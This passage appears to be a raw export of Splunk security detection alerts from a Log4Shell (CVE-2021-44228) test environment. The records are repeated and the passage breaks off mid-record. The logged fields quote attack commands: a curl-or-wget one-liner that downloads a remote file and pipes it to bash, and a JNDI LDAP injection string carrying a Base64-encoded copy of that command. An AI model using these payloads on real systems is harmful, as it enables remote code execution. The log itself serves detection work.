This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642116, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642641854, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Initial Access", annotations._all="PR.PT", annotations._all="Source:Endpoint", annotations._all="CIS 12", annotations._all="DE.CM", annotations._all="CIS 13", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="PR.DS", annotations._all="Command and Control", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642641851, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Execution", annotations._all="Source:Application Log", annotations._all="CIS 5", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1190", annotations._all="DE.CM", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="CIS 16", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", 
annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. 
If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642641854, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Initial Access", annotations._all="PR.PT", annotations._all="Source:Endpoint", annotations._all="CIS 12", annotations._all="DE.CM", annotations._all="CIS 13", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="T1190", annotations._all="Actions on Objectives", annotations._all="T1059", annotations._all="PR.DS", annotations._all="Command and Control", annotations._all="DE.AE", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", 
annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:114", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642641851, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="Stage:Execution", annotations._all="Source:Application Log", annotations._all="CIS 5", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Exploitation", annotations._all="T1190", annotations._all="DE.CM", annotations._all="Reconnaissance", annotations._all="CVE-2021-44228", annotations._all="CIS 3", annotations._all="CIS 16", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", 
annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="unknown", risk_object_type="user", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. 
In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", 
annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", 
annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638231", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:23:51", parent_process_id="8018", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="8020", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642641816, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._all="T1105", annotations._all="Exploitation", annotations._all="Source:Endpoint", annotations._all="Log4Shell CVE-2021-44228", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies 
